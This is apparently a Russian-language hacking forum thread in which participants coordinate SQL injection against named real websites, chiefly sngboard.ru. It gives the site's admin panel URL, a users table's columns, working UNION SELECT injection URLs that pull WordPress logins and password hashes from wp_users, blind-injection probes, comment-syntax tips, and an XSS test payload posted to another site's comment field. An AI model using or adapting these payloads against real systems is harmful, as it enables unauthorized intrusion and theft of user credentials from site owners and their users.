Вот админка
http://www.sngboard.ru/Admin/
(надо с большой буквы).


2 hulk
Вот все колонки в этой таблице

email
id
firstname
lastname
password
phone

@diznt
/* пробовал? Если использовать --, то нужно так:
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--%20-
также пробуй #
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7%23

Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- . Возможно двойной запрос? Хотя ошибка синтаксическая.
Попробуй подзапросы
+and+substring(version(),1,1)=5--
(4,3)

@beerhack
чтение дир возможно благодаря FreeBSD, юзай вот этот скрипт
http://www.blacktoad.info/releases/dir_parsing.txt
@jokester
в MySQL регистр таблиц и колонок не имеет значения

Ты вместо того, что-бы написать это посмотрел-бы линк.

Я не говорил про mysql, я говорил про этот пример
Вот линки :

http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.WP_USERS/*
Table 'wordpress.WP_USERS' doesn't exist

http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.wp_users/*
вывод

если использовать --, то для MySQL необходимо указывать -- с пробелом:
--%20

Почему это "необходимо"? Вообще ни разу не юзал --%20, у меня работает и "--" на ура.

http://dev.mysql.com/doc/refman/5.0/en/comments.html
http://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html

при добавлении коммента "><script>alert()</script> к фотке не одном из сайтов имеем сообщение:
Fatal error: Cannot redeclare class_mysql::$sql_login in /usr/local/www/worlds.ru/req/mysql.class on line 7
что это может быть?
ps/ сильно не пинать я только начинаю)
-------------EDIT---------------------
комменты и так не работают...
спс desTiny )
-------------EDIT---------------------